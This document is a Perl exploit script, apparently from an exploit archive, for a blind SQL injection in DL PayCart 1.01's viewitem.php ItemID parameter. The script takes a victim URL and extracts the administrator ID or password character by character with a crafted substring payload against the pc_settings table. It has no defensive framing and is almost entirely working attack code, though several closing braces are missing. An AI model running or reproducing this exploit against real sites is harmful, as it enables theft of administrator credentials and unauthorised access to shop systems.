DL PayCart 1.01 Blind SQL Injection Exploi
DL PayCart 1.01 (viewitem.php ItemID) Blind SQL Injection Exploit
#!/usr/bin/perl -w
use HTTP::Request;
use LWP::UserAgent;
# scripts : DL PayCart 1.01 - (c) 2006
# Discovered By : irvian
# scripts site : http://www.dinkumsoft.com/
# Thanks To
# bot : sqlscan, hantu_internet, xcart
# chanell : #hitamputih #nyubicrew #patihack and my private channel noscan
# Friend : nyubi, ibnusina, arioo, jipank,ifx and all my friend
if (@ARGV < 2){
die "
use : $0 host option
example : $0 http://victim.com 1
1= AdminID
2= AdminPass\n";}
$url = $ARGV[0];
$option = $ARGV[1];
print "\r\n[+]-----------------------------------------[+]\r\n";
print "[+]Blind SQL injection [+]\r\n";
print "[+]DL PayCart 1.01 - (c) 2006 [+]\r\n";
print "[+]code by irvian [+]\r\n";
print "[+]special To : ifx, arioo, jipank [+]\r\n";
print "[+]-----------------------------------------[+]\n\r";
if ($option eq 1){
syswrite(STDOUT, "AdminID: ", 9);}
elsif ($option eq 2){
syswrite(STDOUT, "AdminPass: ", 11);}
for($i = 1; $i <= 32; $i++){
$f = 0;
$n = 32;
while(!$f && $n <= 255)
if(&blind($url, $option, $i, $n,)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
print "\n[+]finish Execution Exploit\n";
sub blind {
my $site = $_[0];
my $op = $_[1];
my $az = $_[2];
my $na = $_[3];
if ($op eq 1){$klm = "AdminID";}
elsif ($op eq 2){$klm = "AdminPass";}
$blind = "$site"."/viewitem.php?ItemID=1'/**/and/**/substring((select/**/"."$klm"."/**/from/**/pc_settings/**/limit/**/0,1),"."$az".",1)=char("."$na".")/*";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$blind));
$res = $req->content;
if ($res !~ /noimage.gif/i){
return 1;
# 0day.today [2018-01-08] #
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